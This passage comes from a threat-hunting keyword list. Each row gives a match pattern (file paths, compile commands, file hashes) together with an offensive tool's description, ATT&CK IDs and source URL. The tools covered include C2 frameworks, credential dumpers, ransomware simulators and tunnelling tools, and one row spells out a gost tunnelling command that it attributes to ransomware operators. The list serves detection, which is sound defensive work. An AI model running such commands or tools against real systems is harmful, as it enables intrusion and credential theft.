credentialmanager.o*",".{0,1000}\-c\scredentialmanager\.c\s\-o\scredentialmanager\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*-c modifiableautorun.c -o modifiableautorun.o*",".{0,1000}\-c\smodifiableautorun\.c\s\-o\smodifiableautorun\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*-c tokenprivileges.c -o 
tokenprivileges.o*",".{0,1000}\-c\stokenprivileges\.c\s\-o\stokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*-c unquotedsvcpath.c -o unquotedsvcpath.o*",".{0,1000}\-c\sunquotedsvcpath\.c\s\-o\sunquotedsvcpath\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*C&C => *",".{0,1000}C\&C\s\=\>\s.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*c:/chaos-container:/database/*",".{0,1000}c\:\/chaos\-container\:\/database\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "*c:/users/public/creds.log*",".{0,1000}c\:\/users\/public\/creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - 
TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*C:\\temp\\debug.dmp*",".{0,1000}C\:\\\\temp\\\\debug\.dmp.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*C:\\temp\\test.txt*",".{0,1000}C\:\\\\temp\\\\test\.txt.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*C:\\Users\\L.Ackerman=*",".{0,1000}C\:\\\\Users\\\\L\.Ackerman\=.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*C:\\Users\\Public\\example.txt*",".{0,1000}C\:\\\\Users\\\\Public\\\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*C:\\Users\\Public\\Windows\\Ui\\*",".{0,1000}C\:\\\\Users\\\\Public\\\\Windows\\\\Ui\\\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*c:\123.txt*",".{0,1000}c\:\\123\.txt.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1302","244","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*C:\aab.txt*",".{0,1000}C\:\\aab\.txt.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral 
Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*c:\agent.exe*",".{0,1000}c\:\\agent\.exe.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*C:\ASEC.log*",".{0,1000}C\:\\ASEC\.log.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*C:\dsc_hello.txt*",".{0,1000}C\:\\dsc_hello\.txt.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","0","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*C:\kernel.dmp*",".{0,1000}C\:\\kernel\.dmp.{0,1000}","offensive_tool_keyword","DumpKernel-S1.ps1","SentinelHelper to perform a live kernel dump in a Windows environment","T1055 - T1003 - T1112","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://gist.github.com/adamsvoboda/8f29e09d74b73e1dec3f9049c4358e80","1","0","N/A","10","8","N/A","N/A","N/A","N/A" "*C:\ProgramData\Prefetch\na.exe*",".{0,1000}C\:\\ProgramData\\Prefetch\\na\.exe.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - 
TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*C:\ProgramData\SystemData\microsoft_Windows.dll*",".{0,1000}C\:\\ProgramData\\SystemData\\microsoft_Windows\.dll.{0,1000}","offensive_tool_keyword","SysJoker","SysJoker backdoor - multi-platform backdoor that targets Windows Mac and Linux","T1105 - T1140 - T1497 - T1059 - T1070 - T1016 - T1082 - T1074","TA0003 - TA0006 - TA0011 - TA0001 - TA0009 - TA0010 - TA0008 - TA0002","sysjocker","N/A","Exploitation tools","https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*C:\Temp\*-*.kirbi*",".{0,1000}C\:\\Temp\\.{0,1000}\-.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*C:\Temp\file.exe*",".{0,1000}C\:\\Temp\\file\.exe.{0,1000}","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","10","922","102","2024-03-14T16:56:58Z","2020-10-08T11:22:26Z" "*c:\temp\history.csv*",".{0,1000}c\:\\temp\\history\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*c:\temp\history.html*",".{0,1000}c\:\\temp\\history\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*c:\temp\history.txt*",".{0,1000}c\:\\temp\\history\.txt.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*c:\temp\nc.exe*",".{0,1000}c\:\\temp\\nc\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*C:\Temp\poc.txt*",".{0,1000}C\:\\Temp\\poc\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","0","N/A","10","10","277","46","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" "*c:\temp\something.ps1*",".{0,1000}c\:\\temp\\something\.ps1.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*C:\temp\tmp.tmp*",".{0,1000}C\:\\temp\\tmp\.tmp.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*C:\Uac\results.cab*",".{0,1000}C\:\\Uac\\results\.cab.{0,1000}","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege 
Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","0","N/A","10","2","175","31","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*C:\Users\*\AppData\Local\Temp\performance_636_3000_1.dll*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Local\\Temp\\performance_636_3000_1\.dll.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2008R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","N/A","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*C:\Users\*\AppData\Roaming\Indexing.*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\Indexing\..{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*C:\Users\*\AppData\Roaming\svchost.exe*",".{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\svchost\.exe.{0,1000}","offensive_tool_keyword","chaos","Chaos ransomware behavior","T1486","TA0040","chaos ransomware","N/A","Ransomware","https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*C:\Users\cyberstair\*",".{0,1000}C\:\\Users\\cyberstair\\.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*c:\users\public\*.dll*",".{0,1000}c\:\\users\\public\\.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","_","dll file in public user folder","T1036 - T1055 - T1574","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://detect.fyi/rhysida-ransomware-and-the-detection-opportunities-3599e9a02bb2","1","0","observed with PortStarter DLL","10","10","N/A","N/A","N/A","N/A" "*C:\Users\Public\*.dmp*",".{0,1000}C\:\\Users\\Public\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*c:\users\public\creds.log*",".{0,1000}c\:\\users\\public\\creds\.log.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*c:\Users\Public\Documents\log.txt*",".{0,1000}c\:\\Users\\Public\\Documents\\log\.txt.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*C:\Users\Public\example.txt*",".{0,1000}C\:\\Users\\Public\\example\.txt.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on 
Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*c:\users\public\output.txt*",".{0,1000}c\:\\users\\public\\output\.txt.{0,1000}","offensive_tool_keyword","undertheradar","scripts that afford the pentester AV bypass techniques","T1055.005 - T1027 - T1116 - T1070.004","TA0040 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/g3tsyst3m/undertheradar","1","0","N/A","9","1","10","1","2023-10-08T23:31:33Z","2023-07-01T17:59:20Z" "*C:\Users\Public\perm.txt*",".{0,1000}C\:\\Users\\Public\\perm\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*C:\Users\Public\test.txt*",".{0,1000}C\:\\Users\\Public\\test\.txt.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*C:\Windows\DirectX.log*\Windows\Temp\backup.log*",".{0,1000}C\:\\Windows\\DirectX\.log.{0,1000}\\Windows\\Temp\\backup\.log.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","0","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*C:\Windows\System.exe* -L rtcp://0.0.0.0:8087/127.0.0.1:4444 -F 
socks5://*:*@*:443*",".{0,1000}C\:\\Windows\\System\.exe.{0,1000}\s\-L\srtcp\:\/\/0\.0\.0\.0\:8087\/127\.0\.0\.1\:4444\s\-F\ssocks5\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}\:443.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","0","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*C:\Windows\Temp\move.exe*",".{0,1000}C\:\\Windows\\Temp\\move\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*C:\Windows\Temp\moveme.exe*",".{0,1000}C\:\\Windows\\Temp\\moveme\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*c:\windows\temp\test.tmp farmer*",".{0,1000}c\:\\windows\\temp\\test\.tmp\sfarmer.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*C??/generator.cpp*",".{0,1000}C\?\?\/generator\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72*",".{0,1000}c00b3bbcd7cf59063dfc9eae66351a40c7be586e61156347b8c61a8627d6cb72.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c01fb08dabbd24b151fe5dfbb0742f7a*",".{0,1000}c01fb08dabbd24b151fe5dfbb0742f7a.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3*",".{0,1000}c03ef8106c58c8980b7859e0a8ee2363d70e2b7f1346356127c826faf2c0caa3.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333*",".{0,1000}c0439525cf2087fbe8093cd85039fb5efe3557bc47a8a033a7b06657d4119333.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1*",".{0,1000}c05b0803f8793c6bef98a74b8950be5be30dcb0584e634355896230fb8ee19e1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd*",".{0,1000}c062b58a1151df4a0ebad3d9246f69342b0ac1ecf5e5a5c4116f292994c481bd.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" 
"*c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f*",".{0,1000}c070900d71a49302a7c0db6f075b353e46fa8730050ad0e03054d9999a7bf00f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0*",".{0,1000}c0800f3267b958f1f1e3796d2462897b698406ffe2c95c09b6249e84ac753bb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - 